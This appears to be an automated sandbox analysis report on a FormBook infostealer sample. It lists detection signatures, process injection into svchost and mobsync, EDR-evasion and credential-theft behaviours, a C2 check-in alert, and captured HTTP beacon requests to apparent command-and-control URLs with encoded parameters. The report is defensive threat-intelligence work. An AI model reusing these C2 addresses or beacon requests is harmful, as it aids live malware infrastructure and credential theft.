Edit tour

Windows Analysis Report
AxKxwW9WGa.exe

Overview

General Information

Sample name:	AxKxwW9WGa.exe renamed because original name is a hash value
Original sample name:	0de849d3feff2b2fb9e28111e801534621851cf1bd0f01e1e18d28e07ca3ab32.exe
Analysis ID:	1588581
MD5:	fbb92e684ce0e80f01a084850f8e38e1
SHA1:	82142b9ee9092eebbf2ab66b45185cd4e8142a63
SHA256:	0de849d3feff2b2fb9e28111e801534621851cf1bd0f01e1e18d28e07ca3ab32
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

AxKxwW9WGa.exe (PID: 4868 cmdline: "C:\Users\user\Desktop\AxKxwW9WGa.exe" MD5: FBB92E684CE0E80F01A084850F8E38E1)

svchost.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\AxKxwW9WGa.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

TCRjLpECkFbdcm.exe (PID: 5464 cmdline: "C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

mobsync.exe (PID: 6700 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)

firefox.exe (PID: 6696 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3334269313.0000000004960000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1736577132.0000000003650000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1736053839.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3332853744.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1736619988.0000000004E00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3334225307.0000000004910000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3334427443.0000000003BD0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\AxKxwW9WGa.exe", CommandLine: "C:\Users\user\Desktop\AxKxwW9WGa.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AxKxwW9WGa.exe", ParentImage: C:\Users\user\Desktop\AxKxwW9WGa.exe, ParentProcessId: 4868, ParentProcessName: AxKxwW9WGa.exe, ProcessCommandLine: "C:\Users\user\Desktop\AxKxwW9WGa.exe", ProcessId: 7012, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\AxKxwW9WGa.exe", CommandLine: "C:\Users\user\Desktop\AxKxwW9WGa.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\AxKxwW9WGa.exe", ParentImage: C:\Users\user\Desktop\AxKxwW9WGa.exe, ParentProcessId: 4868, ParentProcessName: AxKxwW9WGa.exe, ProcessCommandLine: "C:\Users\user\Desktop\AxKxwW9WGa.exe", ProcessId: 7012, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T02:50:31.483812+0100	2856318	1	A Network Trojan was detected	192.168.2.8	49711	134.0.14.158	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&Ih6=GzF8v0ph3F	Avira URL Cloud: Label: malware
Source: http://www.aballanet.cat/6xrr/	Avira URL Cloud: Label: malware
Source: http://aballanet.cat/6xrr/?T0JX6z9=HxJAUmNG5a	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: AxKxwW9WGa.exe	ReversingLabs: Detection: 68%
Source: AxKxwW9WGa.exe	Virustotal: Detection: 69%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3334269313.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736577132.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736053839.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3332853744.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1736619988.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3334225307.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3334427443.0000000003BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: AxKxwW9WGa.exe

Joe Sandbox ML: detected

Source: AxKxwW9WGa.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.1703862159.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703967239.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703951936.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000003.1812833235.0000000000C4F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TCRjLpECkFbdcm.exe, 00000004.00000000.1659379641.000000000074E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: AxKxwW9WGa.exe, 00000000.00000003.1516452417.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, AxKxwW9WGa.exe, 00000000.00000003.1515414284.0000000003400000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1736320361.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644178466.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1736320361.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641782055.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1744529898.0000000004ACF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1741460974.0000000004919000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AxKxwW9WGa.exe, 00000000.00000003.1516452417.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, AxKxwW9WGa.exe, 00000000.00000003.1515414284.0000000003400000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1736320361.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644178466.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1736320361.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641782055.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.1744529898.0000000004ACF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3334589578.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.1741460974.0000000004919000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.1703862159.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703967239.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1703951936.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, TCRjLpECkFbdcm.exe, 00000004.00000003.1812833235.0000000000C4F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.00000000047EC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.00000000052AC000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2031668617.00000000067CC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: TCRjLpECkFbdcm.exe, 00000004.00000002.3337678767.00000000047EC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3335326583.00000000052AC000.00000004.10000000.00040000.00000000.sdmp, mobsync.exe, 00000005.00000002.3333421133.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2031668617.00000000067CC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004A445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004A445A
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AC6D1 FindFirstFileW,FindClose,	0_2_004AC6D1
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004AC75C
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004AEF95
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004AF0F2
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_004AF3F3
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004A37EF
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004A3B12
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_004ABCBC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CBC560 FindFirstFileW,FindNextFileW,FindClose,	5_2_02CBC560

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 4x nop then xor eax, eax		5_2_02CA9D90
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 4x nop then mov ebx, 00000004h		5_2_04A604EE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.8:49711 -> 134.0.14.158:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.izmirescortg.xyz
Source:	DNS query: www.logidant.xyz

Source: Joe Sandbox View	IP Address: 45.141.156.114 45.141.156.114
Source: Joe Sandbox View	IP Address: 27.124.4.246 27.124.4.246

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004B22EE

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 01:50:42 GMTserver: Apacheset-cookie: __tad=1736560242.4208591; expires=Tue, 09-Jan-2035 01:50:42 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 01:50:44 GMTserver: Apacheset-cookie: __tad=1736560245.6447207; expires=Tue, 09-Jan-2035 01:50:45 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 01:50:47 GMTserver: Apacheset-cookie: __tad=1736560247.2237084; expires=Tue, 09-Jan-2035 01:50:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Source: global traffic	HTTP traffic detected: GET /lnl7/?Ih6=GzF8v0ph3F&T0JX6z9=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6xrr/?T0JX6z9=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&Ih6=GzF8v0ph3F HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
